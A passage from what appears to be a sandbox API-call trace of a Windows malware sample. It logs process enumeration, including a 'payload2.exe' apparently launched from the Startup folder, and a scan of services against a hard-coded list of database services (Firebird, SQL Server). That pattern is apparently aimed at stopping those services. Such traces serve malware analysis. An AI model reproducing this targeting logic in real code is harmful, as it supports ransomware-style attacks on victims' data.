(lpString="incidentoceaneast.exe") returned 21 [0036.002] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0036.003] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0036.003] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0036.004] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0036.004] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0036.004] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0036.004] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0036.005] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0036.005] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.006] lstrlenW (lpString="dllhost.exe") returned 11 [0036.006] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.006] lstrlenW (lpString="dllhost.exe") returned 11 [0036.006] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0036.007] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0036.007] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0036.007] lstrlenW (lpString="cmd.exe") returned 7 [0036.007] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0036.016] lstrlenW (lpString="conhost.exe") returned 11 [0036.016] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0036.021] lstrlenW (lpString="mode.com") returned 8 [0036.021] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0036.031] CloseHandle (hObject=0x16c) returned 1 [0036.031] Sleep (dwMilliseconds=0x1f4) [0036.755] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x67ffe0 [0036.755] EnumServicesStatusExW (in: hSCManager=0x67ffe0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0036.755] GetLastError () returned 0xea [0036.755] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x11e4) returned 0x3948b78 [0036.755] EnumServicesStatusExW (in: hSCManager=0x67ffe0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3948b78, cbBufSize=0x11e4, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3948b78, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0036.756] CloseServiceHandle (hSCObject=0x67ffe0) returned 1 [0036.756] lstrlenW (lpString="Appinfo") returned 7 [0036.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0036.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0036.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0036.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0036.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0036.756] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0036.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0036.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0036.756] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0036.756] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0036.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0036.756] lstrlenW (lpString="AudioSrv") returned 8 [0036.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0036.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0036.757] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0036.757] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0036.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0036.757] lstrlenW (lpString="BFE") returned 3 [0036.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0036.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0036.757] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0036.757] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0036.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0036.757] lstrlenW (lpString="CryptSvc") returned 8 [0036.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0036.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0036.757] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0036.757] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0036.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0036.757] lstrlenW (lpString="CscService") returned 10 [0036.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0036.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0036.757] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0036.757] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0036.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0036.757] lstrlenW (lpString="DcomLaunch") returned 10 [0036.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.757] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0036.757] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0036.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0036.757] lstrlenW (lpString="Dhcp") returned 4 [0036.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0036.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0036.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0036.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0036.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0036.757] lstrlenW (lpString="Dnscache") returned 8 [0036.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0036.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0036.758] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0036.758] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0036.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0036.758] lstrlenW (lpString="DPS") returned 3 [0036.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0036.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0036.758] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0036.758] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0036.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0036.758] lstrlenW (lpString="eventlog") returned 8 [0036.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0036.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0036.758] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0036.758] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0036.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0036.758] lstrlenW (lpString="EventSystem") returned 11 [0036.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0036.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0036.758] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0036.758] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0036.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0036.758] lstrlenW (lpString="gpsvc") returned 5 [0036.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0036.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0036.758] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0036.758] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0036.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0036.758] lstrlenW (lpString="iphlpsvc") returned 8 [0036.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.758] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0036.758] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0036.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0036.758] lstrlenW (lpString="LanmanServer") returned 12 [0036.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0036.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0036.759] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0036.759] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0036.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0036.759] lstrlenW (lpString="LanmanWorkstation") returned 17 [0036.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.759] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0036.759] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0036.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0036.759] lstrlenW (lpString="lmhosts") returned 7 [0036.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0036.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0036.759] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0036.759] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0036.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0036.759] lstrlenW (lpString="MMCSS") returned 5 [0036.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0036.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0036.759] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0036.759] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0036.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0036.759] lstrlenW (lpString="MpsSvc") returned 6 [0036.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0036.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0036.759] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0036.759] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0036.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0036.759] lstrlenW (lpString="Netman") returned 6 [0036.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0036.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0036.759] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0036.759] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0036.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0036.759] lstrlenW (lpString="netprofm") returned 8 [0036.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0036.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0036.760] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0036.760] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0036.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0036.760] lstrlenW (lpString="NlaSvc") returned 6 [0036.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0036.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0036.760] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0036.760] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0036.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0036.760] lstrlenW (lpString="nsi") returned 3 [0036.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0036.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0036.760] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0036.760] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0036.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0036.760] lstrlenW (lpString="PcaSvc") returned 6 [0036.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0036.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0036.760] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0036.760] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0036.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0036.760] lstrlenW (lpString="PlugPlay") returned 8 [0036.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0036.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0036.760] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0036.760] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0036.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0036.760] lstrlenW (lpString="Power") returned 5 [0036.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0036.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0036.760] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0036.760] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0036.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0036.760] lstrlenW (lpString="ProfSvc") returned 7 [0036.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0036.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0036.761] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0036.761] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0036.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0036.761] lstrlenW (lpString="RpcEptMapper") returned 12 [0036.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.761] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0036.761] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0036.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0036.761] lstrlenW (lpString="RpcSs") returned 5 [0036.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0036.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0036.761] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0036.761] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0036.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0036.761] lstrlenW (lpString="SamSs") returned 5 [0036.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0036.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0036.761] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0036.761] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0036.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0036.761] lstrlenW (lpString="Schedule") returned 8 [0036.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0036.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0036.761] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0036.761] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0036.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0036.761] lstrlenW (lpString="SENS") returned 4 [0036.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0036.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0036.761] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0036.761] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0036.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0036.761] lstrlenW (lpString="ShellHWDetection") returned 16 [0036.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.762] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0036.762] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0036.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0036.762] lstrlenW (lpString="Spooler") returned 7 [0036.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0036.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0036.762] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0036.762] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0036.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0036.762] lstrlenW (lpString="SysMain") returned 7 [0036.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0036.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0036.762] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0036.762] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0036.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0036.762] lstrlenW (lpString="Themes") returned 6 [0036.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0036.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0036.762] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0036.762] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0036.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0036.762] lstrlenW (lpString="TrkWks") returned 6 [0036.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0036.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0036.762] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0036.762] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0036.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0036.762] lstrlenW (lpString="UxSms") returned 5 [0036.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0036.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0036.762] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0036.762] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0036.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0036.763] lstrlenW (lpString="WdiServiceHost") returned 14 [0036.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.763] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0036.763] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0036.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0036.763] lstrlenW (lpString="WdiSystemHost") returned 13 [0036.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.763] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0036.763] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0036.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0036.763] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0036.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.763] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0036.763] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0036.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0036.763] lstrlenW (lpString="Winmgmt") returned 7 [0036.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0036.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0036.763] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0036.763] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0036.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0036.763] lstrlenW (lpString="WPDBusEnum") returned 10 [0036.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.763] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0036.763] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0036.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0036.763] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3948b78 | out: hHeap=0x600000) returned 1 [0036.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a8 [0036.767] Process32FirstW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0036.767] Process32NextW (in: hSnapshot=0x1a8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0036.768] lstrlenW (lpString="System") returned 6 